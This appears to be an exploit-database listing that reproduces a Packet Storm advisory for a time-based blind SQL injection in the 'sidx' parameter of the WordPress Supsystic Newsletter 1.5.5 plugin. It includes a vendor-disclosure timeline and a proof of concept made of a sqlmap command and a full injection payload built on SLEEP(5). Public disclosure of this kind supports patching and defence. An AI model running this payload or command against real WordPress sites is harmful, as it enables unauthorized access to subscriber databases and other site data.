Exploit for WordPress Supsystic Newsletter 1.5.5 SQL Injection

Name: Exploit for WordPress Supsystic Newsletter 1.5.5 SQL Injection
Rating: 5 (204 reviews)

2021-02-08 | CVSS -0.0

## https://sploitus.com/exploit?id=PACKETSTORM:161306
# Exploit Title: WordPress Plugin Supsystic Newsletter 1.5.5 - 'sidx' SQL injection  
# Date: 24/07 2020  
# Exploit Author: Erik David Martin  
# Vendor Homepage: https://supsystic.com/  
# Software Link: https://downloads.wordpress.org/plugin/newsletter-by-supsystic.1.5.5.zip  
# Category: Web Application  
# Version: 1.5.5  
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2  
  
  
# 25/07 2020: Vendor notified  
# 27/07 2020: Vendor requested detailed information  
# 27/07 2020: Information provided  
# 07/08 2020: Nudged vendor. No reply  
# 22/08 2020: Nudged vendor. No reply  
# 04/10 2020: Nudged vendor. No reply  
# 29/11 2020: WordPress Plugin Security team contacted  
# 01/12 2020: Plugin/Project closed by WordPress Security team  
  
  
# 1. Description  
  
The GET parameter "sidx" does not sanitize user input when searching for existing subscribers.  
  
  
# 2. Proof of Concept (PoC)  
  
Use ZAP/Burp to capture the web request when searching for existing subscribers and save it to request.txt.  
Referer: http://192.168.0.49/wp-admin/admin.php?page=newsletters-supsystic&tab=subscribers  
  
sqlmap -r request.txt --dbms=mysql -p sidx  
  
Parameter: sidx (GET)  
Type: time-based blind  
Payload: mod=subscribers&action=getListForTbl&pl=nbs&reqType=ajax&search[text_like]=testing&search[search_list]=0&_search=false&nd=1595780014444&rows=25&page=0&sidx=id AND (SELECT 1511 FROM (SELECT(SLEEP(5)))gTHi)&sord=desc